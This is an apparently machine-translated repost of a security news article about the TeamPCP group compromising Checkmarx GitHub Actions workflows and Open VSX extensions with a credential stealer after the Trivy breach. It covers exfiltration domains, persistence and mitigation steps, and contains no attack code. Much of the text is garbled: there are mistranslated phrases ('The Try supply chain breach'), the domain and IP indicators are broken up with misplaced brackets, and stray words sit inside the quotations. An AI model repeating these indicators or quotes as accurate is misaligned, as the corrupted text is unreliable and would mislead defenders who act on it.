Two more GitHub Actions workflows became the latest vulnerabilities to be compromised by credential-stealing malware by a threat actor known as TeamPCP, the cloud-native cybercrime operation that was also behind the Trivy supply chain attack.
Both workflows are maintained by supply chain security company Checkmarx and are listed below.
Cloud security company Sysdig announced that it observed the same credential stealer used in TeamPCP’s operation targeting Aqua Security’s Trivy vulnerability scanner and related GitHub Actions approximately four days after the March 19, 2026, breach. The Try supply chain breach is tracked with CVE identifier CVE-2026-33634 (CVSS score: 9.4).
“This suggests that the credentials stolen in the Trivy breach were used to poison further actions on the affected repositories,” Sysdig said.
Dubbed the “TeamPCP Cloud stealer,” the stealer is designed to steal credentials and secrets related to SSH keys, Git, Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Kubernetes, Docker, .env files, databases, and VPNs, as well as CI/CD configurations, cryptocurrency wallet data, and Slack and Discord webhook URLs.
As with Trivy, threat actors have been found to forcefully push tags onto malicious commits containing stealer payloads (‘setup.sh’). The stolen data is leaked to the domain “checkmarx”.[.]Zone” (IP address: 83.142.209)[.]11:443), stored in the form of an encrypted archive (‘tpcp.tar.gz’).
The new version uses the victim’s GITHUB_TOKEN to create a “docs-tpcp” repository to stage stolen data as a backup method in case the server exfiltration fails. In the Trivy incident, the attackers used the repository name “tpcp-docs” instead.
“Using vendor-specific typosquat domains for each poisoned action is an intentional deception technique,” Sysdig said. “Analysts reviewing CI/CD logs will see curled traffic to what appears to be the action’s own vendor domain, making it less likely to be detected manually.”
The main function of the stealer is to collect credentials from CI runner memory, allowing operators to extract GitHub personal access tokens (PATs) and other secrets when a compromised Trivy action is executed in a workflow. Even worse, if these tokens have write access to a repository that uses the Checkmarx action, an attacker could weaponize them to push malicious code.
This opens the door to cascading supply chain compromises, where one tainted action obtains secrets that can be used to facilitate the taint of other actions.
“The identical payload, encryption method, and naming convention for tpcp.tar.gz confirm that this is the same actor expanding its reach beyond the initial Trivy compromise,” Sysdig notes. “Code review and dependency scanning failed because malicious code was injected into a source trusted action.”
According to Wiz, the attack appears to have been carried out via a compromise of the “cx-plugins-releases” service account, and the attackers also published trojanized versions of the Open VSX extensions “ast-results” (version 2.53.0) and “cx-dev-assist” (version 1.7.0). VS Code Marketplace versions are not affected.
Once the extension is activated, the malicious payload checks if the victim has credentials for at least one cloud service provider, such as GitHub, AWS, Google Cloud, or Microsoft Azure. If credentials are detected, proceed to fetch the next stage payload from the same domain (‘checkmarx'[.]zone”).
Wiz researchers Rami McCarthy, James Haughom, and Benjamin Read said, “The payload attempts to execute via npx, bunx, pnpx, or yarn dlx. This covers the major JavaScript package managers.” “The retrieved package contains a comprehensive credential stealer. The harvested credentials are encrypted using a key and exfiltrated to ‘checkmarx’ as elsewhere in this campaign.[.]Specify zone/vsx’ as tpcp.tar.gz. ”
“On non-CI systems, the malware installs persistence through the systemd user service. The persistence script polls https://checkmarx.”[.]Run zone/raw every 50 minutes for additional payloads and use a kill switch to abort if the response contains “youtube”. The link now redirects to Queen’s The Show Must Go On. ”
To mitigate the threat, we recommend that users take the following actions immediately:
Rotate all secrets, tokens, and cloud credentials that CI runners had access to during the affected period. Audit GitHub Actions workflows run on references to tpcp.tar.gz, scan.aquasecurity[.]org, or checkmarx[.]Runner log zone. Search your GitHub organization for a repository named “tpcp-docs” or “docs-tpcp”. This indicates successful extraction with a fallback mechanism. Pin GitHub Actions to full commit SHAs instead of version tags, since tags can be force-pushed. Monitor outbound network connections from the CI runner to suspicious domains. Use IMDSv2 to restrict Instance Metadata Service (IMDS) from the CI runner container.
In the days following the initial breach, TeamPCP attackers pushed a malicious Docker image of Trivy containing the same stealer, took over the company’s “aquasec-com” GitHub organization, and modified dozens of internal repositories.
It has also been observed targeting Kubernetes clusters with a malicious shell script that wipes all machines when it detects systems that match Iranian timezones and locales, highlighting a new expansion in the group’s modus operandi.
Source link
